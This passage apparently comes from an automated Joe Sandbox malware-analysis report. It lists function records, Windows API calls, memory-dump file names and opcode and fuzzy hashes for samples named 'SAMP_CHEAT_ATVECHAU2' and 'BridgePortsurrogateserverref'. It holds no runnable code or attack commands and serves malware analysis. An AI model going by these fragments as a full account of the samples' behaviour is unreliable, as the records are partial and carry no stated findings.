                                                      • Part of subcall function 00CF4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CF40A5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: __vswprintf_c_l_swprintf
                                                    • String ID: %c:\
                                                    • API String ID: 1543624204-3142399695
                                                    • Opcode ID: b4326200416f7f586aafd6c226aa90ddb7c53382a65129be309b32a3085b19a2
                                                    • Instruction ID: bfc8100a159af05b09361546b26d5627f33598524143404dc71c9d7cc72243b6
                                                    • Opcode Fuzzy Hash: b4326200416f7f586aafd6c226aa90ddb7c53382a65129be309b32a3085b19a2
                                                    • Instruction Fuzzy Hash: 4801F56350031679DAB06B35EC42D7BA7ACEF96770B40450AF658D6182EF30DD9492B2
                                                    APIs
                                                    • CreateThread.KERNEL32(00000000,00010000,00D01160,?,00000000,00000000), ref: 00D01043
                                                    • SetThreadPriority.KERNEL32(?,00000000), ref: 00D0108A
                                                      • Part of subcall function 00CF6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CF6C54
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Thread$CreatePriority__vswprintf_c_l
                                                    • String ID: CreateThread failed
                                                    • API String ID: 2655393344-3849766595
                                                    • Opcode ID: 6421361f51569ca3e22d8461fc35ac8c7c4935e76ecbc081c0aab3768468c032
                                                    • Instruction ID: 15db31f7492d01b5468ccf6913ad134d1a38f627851ba9bf5fc91642cd9c4b09
                                                    • Opcode Fuzzy Hash: 6421361f51569ca3e22d8461fc35ac8c7c4935e76ecbc081c0aab3768468c032
                                                    • Instruction Fuzzy Hash: 9001F9B934430A6FD3345F68AC92B7673A8EB50751F20042EF6CA922C0CAE168859635
                                                    APIs
                                                      • Part of subcall function 00CFE2E8: _swprintf.LIBCMT ref: 00CFE30E
                                                      • Part of subcall function 00CFE2E8: _strlen.LIBCMT ref: 00CFE32F
                                                      • Part of subcall function 00CFE2E8: SetDlgItemTextW.USER32(?,00D2E274,?), ref: 00CFE38F
                                                      • Part of subcall function 00CFE2E8: GetWindowRect.USER32(?,?), ref: 00CFE3C9
                                                      • Part of subcall function 00CFE2E8: GetClientRect.USER32(?,?), ref: 00CFE3D5
                                                    • GetDlgItem.USER32(00000000,00003021), ref: 00CF135A
                                                    • SetWindowTextW.USER32(00000000,00D235F4), ref: 00CF1370
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                    • String ID: 0
                                                    • API String ID: 2622349952-4108050209
                                                    • Opcode ID: 210bd0090ed71933dd25aeba3f97f4c5f6a435d88ccf5e22340258007b2d807c
                                                    • Instruction ID: f423ea49cd679cda5338cbc278d1674516a4fa29418a531cfa1218475e39d599
                                                    • Opcode Fuzzy Hash: 210bd0090ed71933dd25aeba3f97f4c5f6a435d88ccf5e22340258007b2d807c
                                                    • Instruction Fuzzy Hash: 66F0AF3110438CEADF550F608C0DBFA3B58AF003A5F088514FE9890AB1DB78CA98EE21
                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00D01206,?), ref: 00D00FEA
                                                    • GetLastError.KERNEL32(?), ref: 00D00FF6
                                                      • Part of subcall function 00CF6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CF6C54
                                                    Strings
                                                    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00D00FFF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                    • API String ID: 1091760877-2248577382
                                                    • Opcode ID: d85c0894ededae30c94fd9765d071d630797315709165b62cb31806e4418945c
                                                    • Instruction ID: 7ba0639f58ab59933ab9d8d819f42b24da41a7983ad47e7ede5f0f41ff16e196
                                                    • Opcode Fuzzy Hash: d85c0894ededae30c94fd9765d071d630797315709165b62cb31806e4418945c
                                                    • Instruction Fuzzy Hash: 19D02E325482343AD6203724AD0AE7E3804AB32731F200704F2B8A23F6CA280D8262B2
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,00CFDA55,?), ref: 00CFE2A3
                                                    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00CFDA55,?), ref: 00CFE2B1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: FindHandleModuleResource
                                                    • String ID: RTL
                                                    • API String ID: 3537982541-834975271
                                                    • Opcode ID: f0e6a0b161d9df688d95adb9d877a95fdb2d8b6e6eed05e246c6a501f3b4433a
                                                    • Instruction ID: 8458882c163ecf3a662b8a1e98994a9c731d8e3fff68f154082cdba969c615b2
                                                    • Opcode Fuzzy Hash: f0e6a0b161d9df688d95adb9d877a95fdb2d8b6e6eed05e246c6a501f3b4433a
                                                    • Instruction Fuzzy Hash: 82C0123134071067E6302B647D0DB436A585B20B15F050458B281E92D1D6A9C64586B0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: "9$5X_H$b4$r6$r6
                                                    • API String ID: 0-3501087565
                                                    • Opcode ID: 4cd2fd339d4fcb02c077742d31b3a38227c5b0fc8a5575973136437a36a5bc0b
                                                    • Instruction ID: b2cbed6911e76bedbda643fe113aa76de9a990ac7d63c11cf1b76c8ff6d46e76
                                                    • Opcode Fuzzy Hash: 4cd2fd339d4fcb02c077742d31b3a38227c5b0fc8a5575973136437a36a5bc0b
                                                    • Instruction Fuzzy Hash: C59104B5918A8A8FE789DB28C8657B97FE0EF96304F0440BAD00DD72D6DF781804CB81
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: b4$r6$r6
                                                    • API String ID: 0-3183416175
                                                    • Opcode ID: a70eaa381b4e2be481645b65239253459a1859818ab5f2def76a7e7c97d5b148
                                                    • Instruction ID: b479a4c1cec51a9016cc0440b6fbf2c279284e28ffb813da3b8f8b759f298ffa
                                                    • Opcode Fuzzy Hash: a70eaa381b4e2be481645b65239253459a1859818ab5f2def76a7e7c97d5b148
                                                    • Instruction Fuzzy Hash: 20510FB1A28A4A8EE789DB18C86A7B97FE4EBD6314F04407ED00DD77D5CB781814CB80
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: r6$r6$r6
                                                    • API String ID: 0-701349563
                                                    • Opcode ID: 799b14b05e3cceab26bb41339ae497e8590234ad723f2e1a5e1417a78b6485e2
                                                    • Instruction ID: 994b2ecc6289277140fa7bafb9081e11579b95edbbfa012c34ccbde4edd37e95
                                                    • Opcode Fuzzy Hash: 799b14b05e3cceab26bb41339ae497e8590234ad723f2e1a5e1417a78b6485e2
                                                    • Instruction Fuzzy Hash: 19C1BF75A19A478FE749DB28C0906B4B7E1FF5A300F5481B9D04ECBA86CB28F955CBC0
                                                    Strings
                                                    Memory Dump Source
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8b400733f09342fabae69b1fe52611cf88fc193f60f0275171dc08c4d7b4a43d
                                                    • Instruction ID: 2e9c8f64ca56c88cb6d4b1bc5c469976e7f185ff407463fb7b531d46fb9d505c
                                                    • Opcode Fuzzy Hash: 8b400733f09342fabae69b1fe52611cf88fc193f60f0275171dc08c4d7b4a43d
                                                    • Instruction Fuzzy Hash: 33C1BD3491A656CBEB0DCF28C0E05B537A1FF46305B5485BDD84F8B68BDA38E985CB81
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 165f243de1022fd7a457bb5b366f1f4b2197d29c18874edbdbf98d8d22d021a2
                                                    • Instruction ID: 774d283fca89d28954ed6c19d785f4f90a3ddeb85f336b6f5bbbef8fd9fac971
                                                    • Opcode Fuzzy Hash: 165f243de1022fd7a457bb5b366f1f4b2197d29c18874edbdbf98d8d22d021a2
                                                    • Instruction Fuzzy Hash: 3F311229D0E643DBF224A778E8616F86B40AF46334F2C8536D04E875D6CE19BA4D47D2
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 26858e659a6cf59845a59c067331c6bd4e5a6bc3a071913062dfd88a103715d1
                                                    • Instruction ID: a8cb573458aa8ea4bf21e317d6bafcd9d6d79fb2d88217af905fe14801e41bd2
                                                    • Opcode Fuzzy Hash: 26858e659a6cf59845a59c067331c6bd4e5a6bc3a071913062dfd88a103715d1
                                                    • Instruction Fuzzy Hash: 76A16131608948CFDF89EF58C499EA5B7E1FFA9301B1541A9D00EC76A6DE35EC84CB81
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c336a5b306df58d8c373104fa82eb38f50dc58390bf913fe3e835849265ccb41
                                                    • Instruction ID: bea3603d5d536152ea2462e8e1a115f94641bcf3ce8a175e5a81714a8ab5d8a3
                                                    • Opcode Fuzzy Hash: c336a5b306df58d8c373104fa82eb38f50dc58390bf913fe3e835849265ccb41
                                                    • Instruction Fuzzy Hash: 00118E5DD1E797CAFA29436414211B85BA09F43B20FA881FAD54E8F0D2DD1CEA4D53D3
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5947a2f6e48ef7191b7b0d50000bbe1a32dcedd07c5b08ebf80d6efd1a080f77
                                                    • Instruction ID: bad3f919ce4ab979087c035b61f5f712b5d2c94aec76ef1bc8d2358a5d6bc1ca
                                                    • Opcode Fuzzy Hash: 5947a2f6e48ef7191b7b0d50000bbe1a32dcedd07c5b08ebf80d6efd1a080f77
                                                    • Instruction Fuzzy Hash: 1E81263690E647CFF3289B289445575B7E0EF87310B14857ED48ECB582DE29FA4A87C1
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 534d8b02a3e05ad31a768f1c9df9bf4e0842b2fa70a81c39572783152abd1180
                                                    • Instruction ID: acb6e0fff6b029cc9bc7aa725b860802ea12def38e4dc8710e7003932d8420f9
                                                    • Opcode Fuzzy Hash: 534d8b02a3e05ad31a768f1c9df9bf4e0842b2fa70a81c39572783152abd1180
                                                    • Instruction Fuzzy Hash: 0981493591DA868FF3689B28984157577E0EF87350B14847ED48FC3583CE28FA0A87A6
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3a1653bb519e139cd364e7ab2c65a56e09065fe568240065dc187169169cda5c
                                                    • Instruction ID: a09b5d7420407efbac606555aaf984f1aca8efd6b8c4026cb10de4b90ceaab05
                                                    • Opcode Fuzzy Hash: 3a1653bb519e139cd364e7ab2c65a56e09065fe568240065dc187169169cda5c
                                                    • Instruction Fuzzy Hash: 7081247590DA46CFF3689B2C944517977E8FF86310B14847EE48FC3192DE28FA4A8781
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 62b6d6a74cdd68309749ce65baf337d3551168564f86ef05a13c2c28cda3ba2e
                                                    • Instruction ID: 5d5f34d2a07cec577094e74247a6f6da410879f523c9873efa259e1bc25ee195
                                                    • Opcode Fuzzy Hash: 62b6d6a74cdd68309749ce65baf337d3551168564f86ef05a13c2c28cda3ba2e
                                                    • Instruction Fuzzy Hash: 4671233990E849CFF768DB1884565B837D0FF86311B1882B9D09EC75A6DF18EA0E87C1
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dbcff9615cc071c48db80530abad2876e60af8b65989f75980fd7737f286b8d8
                                                    • Instruction ID: ad9ffdd2f236c3f6cf090bdd4536694c80ca9d7e589f3836c0666a9eec0a52d5
                                                    • Opcode Fuzzy Hash: dbcff9615cc071c48db80530abad2876e60af8b65989f75980fd7737f286b8d8
                                                    • Instruction Fuzzy Hash: 2871173D50E54ACFF768DB1888565B437D0EF46311F1482BAD19ECB992DE18EA0E87C2
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4f033a467bd08bd91a3a6ba4aa8809fed83f29836f4f77c39475b8cbfd497a4d
                                                    • Instruction ID: 3380c81975d435699dc394d7e20128abda7c6cc867c99eddf446e48e9d38c516
                                                    • Opcode Fuzzy Hash: 4f033a467bd08bd91a3a6ba4aa8809fed83f29836f4f77c39475b8cbfd497a4d
                                                    • Instruction Fuzzy Hash: A961F67950E4898FF7A8DB188C565BD77C0FF96320B0842B9D09EC75A2DD18EA0E87C1
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 09371c95053bfd6cccc382a879d666951913c62f40cde08c021c0f3926b6f724
                                                    • Instruction ID: 829f1051a1c2824506c4a16fedee70e565e8aaa7e80ee6371266f43c4aa60225
                                                    • Opcode Fuzzy Hash: 09371c95053bfd6cccc382a879d666951913c62f40cde08c021c0f3926b6f724
                                                    • Instruction Fuzzy Hash: FE414922A4C6564FE305F77CA0966F97784DF8A325B1485BBE04EC72A7DE18A84583C4
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0d23e66344977e3c682d6973e550e9b579487db710973f6725fd04ce404ac9a2
                                                    • Instruction ID: 43c3536e621fa2f3dff9a70fc80c9ebe43bda3cf00452afefd793c575ebd9a95
                                                    • Opcode Fuzzy Hash: 0d23e66344977e3c682d6973e550e9b579487db710973f6725fd04ce404ac9a2
                                                    • Instruction Fuzzy Hash: 8041613160CA188FDF98EB18C495EB5B7E1FBA932470441A9D00FC3552DF35E959CB81
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 43e2b1adbeaa94e64e72d00688f1efd0526b3b204648e29e35d8a93b4d11d361
                                                    • Instruction ID: 9cecc2813c932336506bfb42b4bfe2772d13a552a3cfc5d7b7f03de4863681f4
                                                    • Opcode Fuzzy Hash: 43e2b1adbeaa94e64e72d00688f1efd0526b3b204648e29e35d8a93b4d11d361
                                                    • Instruction Fuzzy Hash: 99415F31A0CA598FEF98EF18C499EB5B7E1FBA93107044179E00EC7696DE35E845CB81
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5f261567df25df4eaa547c6ceecbb8ca8d9d2cb3624ea5dfb04d0fed0e58121f
                                                    • Instruction ID: 26b660782c3b1a2524c05fda556cbb6c7ca50774c95f66499d77cf37ff11bd54
                                                    • Opcode Fuzzy Hash: 5f261567df25df4eaa547c6ceecbb8ca8d9d2cb3624ea5dfb04d0fed0e58121f
                                                    • Instruction Fuzzy Hash: CB31B56AD0E68BCBFB29575498155B93B90EF03B20F18417EE44F874C2DF0CAA5993D2
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2d4a0239bff6f9e99af5b731a7f587a50c4b488af14bbf30066e7bf5edff05a9
                                                    • Instruction ID: d739a7f51af4a0fecd1b03267fdb78101e23e5ce44f8a8ffbb4dff80fe8a98ba
                                                    • Opcode Fuzzy Hash: 2d4a0239bff6f9e99af5b731a7f587a50c4b488af14bbf30066e7bf5edff05a9
                                                    • Instruction Fuzzy Hash: B0316031A08A498FDB98EF28C499EB477E1FBA931070441B9E00EC7192DE34E844CB81
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 47e797328cd6d0a16c7a9dd51fa7bfe679020716cfe38cddb9592d88d3b79293
                                                    • Instruction ID: aa8c7ee4e870bda68792eb0027487f7649233b77fc0fae367b18c1083621cb9f
                                                    • Opcode Fuzzy Hash: 47e797328cd6d0a16c7a9dd51fa7bfe679020716cfe38cddb9592d88d3b79293
                                                    • Instruction Fuzzy Hash: 7C316D31608A588FDB58EB28C0A5EB4B7E1FBA931570442A9D04FC7592DE35E948CB81
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3562fc34eba01e059b3bfb66d6151234880e16df180b5de5b997bf090c3f3dcc
                                                    • Instruction ID: 971eaf9f6549d84f343ee480f0c2c188420524f85840a3bab2cf322f395870d3
                                                    • Opcode Fuzzy Hash: 3562fc34eba01e059b3bfb66d6151234880e16df180b5de5b997bf090c3f3dcc
                                                    • Instruction Fuzzy Hash: 91317231618A49DFEF98EF28C099EB5B7E1FBA93107044179E00EC7692DE35E845CB81
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 82b3890a10ae5f3da53ac6b93f815f8794f41bbbee803481172cc92da9129aa1
                                                    • Instruction ID: 369921628cc468cc739aeac8acff004a28ab6c8585435fdf341edaf9caceaacc
                                                    • Opcode Fuzzy Hash: 82b3890a10ae5f3da53ac6b93f815f8794f41bbbee803481172cc92da9129aa1
                                                    • Instruction Fuzzy Hash: 57317E31608A598FDF98EB28C095EB5B7E1FBA931470441A9D00FC7692DF39E949CB81
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ea1d2937b19976a4ccf8f8b9c1a1c8bab653accd5a9fbf4460f5c834bbd09617
                                                    • Instruction ID: c1466b8344764576bfa59cd93ae24b6e9d9ed5d7c1424941152e2eaf96030836
                                                    • Opcode Fuzzy Hash: ea1d2937b19976a4ccf8f8b9c1a1c8bab653accd5a9fbf4460f5c834bbd09617
                                                    • Instruction Fuzzy Hash: 3C31D321A1CA1A4FF648B77CA45AAB963C5DF89325F1584BAE40EC32E7DD28EC4143C4
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6928ae50028893a9161f208e91f5b87b4aa3130d9c1b41e4d55361956b280ec9
                                                    • Instruction ID: 66b35c9421a056c831c0427d91f106c7fd118cae3d0bed6bdbcac83e8d0c3208
                                                    • Opcode Fuzzy Hash: 6928ae50028893a9161f208e91f5b87b4aa3130d9c1b41e4d55361956b280ec9
